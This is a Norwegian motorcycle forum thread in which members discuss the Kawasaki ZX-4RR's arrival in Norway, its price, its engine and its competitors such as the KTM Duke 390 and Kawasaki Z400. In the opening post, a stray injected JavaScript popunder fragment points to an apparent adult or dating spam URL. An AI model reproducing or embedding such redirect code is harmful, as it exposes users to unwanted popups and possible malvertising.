ZX-4RR på vei til Norge

Forum for fulleffekt tung-MC
Svar
iris
Innlegg: 150
Registrert: 13 mai 2022, 20:54
Motorsykkelen din: Duke 125 2015

ZX-4RR på vei til Norge

Legg inn av iris »

2023-kawasaki-ninja-zx-4rr-first-look-21.jpg
Kom noen Facebook-innlegg av Kawasaki Norge, og den ligger nå på nettsiden til Kawasaki Norge, 2024 mod. Fra skatteetatens kalkulator ville import fra andre EU land som har bekreftet pris koste ca. 130000kr totalt, så det blir nok noe rundt det hos forhandlere.

');var popunder = {expire: 6, url: "https://flirthoney-hot.life/?u=lcd8hwq&o=h6dw1n9"};}

Tanker? Kawasaki gir liv til en klasse motorsykler som har egentlig dødd ut. Siste gang I4 400cc screamer var solgt i Europa var vel rundt 90-tallet? Den kan nok plomberes til A2 også, men ville ikke være særlig gøy da. Er heller ikke reklamert som A2-compatible på Kawasaki's nettside. I still want it :yeyeye
Du har ikke de nødvendige tillatelsene for å vise filene som er tilknyttet dette innlegget.

Brukeravatar
dypen
Innlegg: 5300
Registrert: 28 mai 2018, 20:55
Motorsykkelen din: K1600GT
Sted: Lillestrøm

Re: ZX-4RR på vei til Norge

Legg inn av dypen »

Det var da voldsomt … :thumleft rødmerking på 16000 og rekkefirer på 75 hester. Ikke all verdens moment men det ligger i kortene da det er turtall … Lykke til her er det mye morro fra Kawasaki :)
dypen :thumleft
Tempo Swing 150, Monark Maraton ILO Piano 50, Tempo Comet 60 +++ Suzuki AS 50, Yamaha LS2 100 første, Yamaha LS2 100 andre, Yamaha RS 100, Kawasaki Mach III H1 500, Honda CB750 Four K2, Kawasaki Z1000, Yamaha XT500, Baotian BT50QT, Chang Jiang 750 M1S sidevogn, Honda CB500X, KTM 1050 Adventure, Yamaha YZF-R1 5JJ, KTM 1290 Super Adventure S, Honda XL700VA Transalp, Kawasaki KZ900-A4, Kawasaki Z1A 900, BMW K1600GT, Yamaha XS500D 1H2

Brukeravatar
AJ
Administrator
Innlegg: 37888
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: ZX-4RR på vei til Norge

Legg inn av AJ »

Kawasaki kan dette med rekkefirere, små som store. Det skal de ha :crazy:!

Kawasaki er vel også den eneste som utfordrer KTM 390 Duke i denne A2 kubikklassen med denne modellen:

https://www.kawasaki.no/no/products/Sup ... FtfDglaCgk
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

iris
Innlegg: 150
Registrert: 13 mai 2022, 20:54
Motorsykkelen din: Duke 125 2015

Re: ZX-4RR på vei til Norge

Legg inn av iris »

AJ skrev: 07 jul 2023, 18:39 Kawasaki kan dette med rekkefirere, små som store. Det skal de ha :crazy:!

Kawasaki er vel også den eneste som utfordrer KTM 390 Duke i denne A2 kubikklassen med denne modellen:

https://www.kawasaki.no/no/products/Sup ... FtfDglaCgk
Duke er naked, så det er Z400 som utfordrer duken, ikke Ninja. Er parallel twin vs single der også. Synd at Honda ikke selger sine 400 her i Europa.

og duke 390 er 20000kr billigere enn z400...

Brukeravatar
AJ
Administrator
Innlegg: 37888
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: ZX-4RR på vei til Norge

Legg inn av AJ »

iris skrev: 08 jul 2023, 00:58
AJ skrev: 07 jul 2023, 18:39 Kawasaki kan dette med rekkefirere, små som store. Det skal de ha :crazy:!

Kawasaki er vel også den eneste som utfordrer KTM 390 Duke i denne A2 kubikklassen med denne modellen:

https://www.kawasaki.no/no/products/Sup ... FtfDglaCgk
Duke er naked, så det er Z400 som utfordrer duken, ikke Ninja. Er parallel twin vs single der også. Synd at Honda ikke selger sine 400 her i Europa.

og duke 390 er 20000kr billigere enn z400...
Se der, ja!
Du har helt rett.
Det er denne som "går i strupen" på Duke 390 :crazy: :
https://www.kawasaki.com/en-us/motorcyc ... 3-z400-abs
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

Greddy
Innlegg: 121
Registrert: 13 okt 2019, 00:13
Motorsykkelen din: Yamaha MT-10 SP, Tracer 900 GT, XT1200ZE

Re: ZX-4RR på vei til Norge

Legg inn av Greddy »

Vi har jo KTM RC390 også som konkurrer mot Ninja 400

iris
Innlegg: 150
Registrert: 13 mai 2022, 20:54
Motorsykkelen din: Duke 125 2015

Re: ZX-4RR på vei til Norge

Legg inn av iris »

Greddy skrev: 08 jul 2023, 15:55 Vi har jo KTM RC390 også som konkurrer mot Ninja 400
Både Duken og RC er 20000 billigere enn deres kawi counterpart, så "konkurerer" er litt sterkt. Duke à 63900, Z400 à 85990, RC og Ninja ca. 10000kr mer hver. Man betaler effektivt 20000kr for en ekstra sylinder. For en ung fører så ser jeg ikke poenget med det.
dypen skrev: 07 jul 2023, 18:34 Det var da voldsomt … :thumleft rødmerking på 16000 og rekkefirer på 75 hester. Ikke all verdens moment men det ligger i kortene da det er turtall … Lykke til her er det mye morro fra Kawasaki :)
Og det er med 3 katalysatorer og forskjellige restriksjoner. Veldig imponerende ift. den siste gangen slike sykler var solgt her. Litt lav dreiemoment pga de restriksjonene, da...

Ryan mener den kan legge på enda mer hester og betydelig høyere dreiemoment hvis de er fjerna, med big science forklaring i videoen. Skal være artig å se resultatene av dette.
Sist redigert av iris den 08 jul 2023, 20:14, redigert 1 gang totalt.

BjørnSover
Innlegg: 394
Registrert: 01 des 2020, 21:34
Motorsykkelen din: BMW R1200GSA 2018
Sted: Stavanger

Re: ZX-4RR på vei til Norge

Legg inn av BjørnSover »

Blir spennende å se hva prisen på denne blir i Norge. Snakkes vel om 10k usd over there.

Brukeravatar
AJ
Administrator
Innlegg: 37888
Registrert: 30 sep 2006, 18:46
Motorsykkelen din: KTM 1290 SA S, ('18), Moto Guzzi v7 850 Special 100 year Anniversary
Sted: Lunner på Hadeland
Kontakt:

Re: ZX-4RR på vei til Norge

Legg inn av AJ »

Når jeg mener de er konkurrenter så handler det først og fremst om spesifikasjoner som kubikkstørrelse og modell/segment.
Nakensykkel uten særlig kåpedetaljer mot ditto sykkel av annet merke, typisk racingpreget sykkel mot tilsvarende av annet merke, adventureorientert sykkel kontra samme av annet merke osv.
________________________________________________________________________
De som ønsker å bidra økonomisk til driften av forumet kan benytte et av alternativene her.

MC'er:
Suzuki GSX 1100 EF, 1985 (1991), Yamaha TDM 900, 2006 (2006 - 2010), Triumph Tiger 1050 SE, 2010 (2010 - 2012), Moto Guzzi Stelvio 8V, 2012 (2012 - 2015), KTM 1290 Super Adventure, 2015 (2015 - 2018), KTM 1290 Super Adventure S, 2018 (2018 - -->), KTM 390 Duke, 2021 (2021 - 2023), Moto Guzzi V7 850 Special 100 Anniversary (2023 - -->)
KTM 1290 SA S - nok en god grunn til oppmaskinering Bilde

iris
Innlegg: 150
Registrert: 13 mai 2022, 20:54
Motorsykkelen din: Duke 125 2015

Re: ZX-4RR på vei til Norge

Legg inn av iris »

BjørnSover skrev: 08 jul 2023, 20:10 Blir spennende å se hva prisen på denne blir i Norge. Snakkes vel om 10k usd over there.
9995 eur i Tyskland nå, er der jeg regna ut ca. 130000kr fra.

https://www.kawasaki.de/de/products/Sup ... FkMDQsNDAs

Greddy
Innlegg: 121
Registrert: 13 okt 2019, 00:13
Motorsykkelen din: Yamaha MT-10 SP, Tracer 900 GT, XT1200ZE

Re: ZX-4RR på vei til Norge

Legg inn av Greddy »

Jeg vil tro at sykkelen er for de godt voksne som var gamle nok i 1990-tallet. Dette er nesten retro. Ikke en sykkel rettet mot 18-åringen. Premium sykkel med justerbare dempere. Noe dette segmentet mangler.

Svar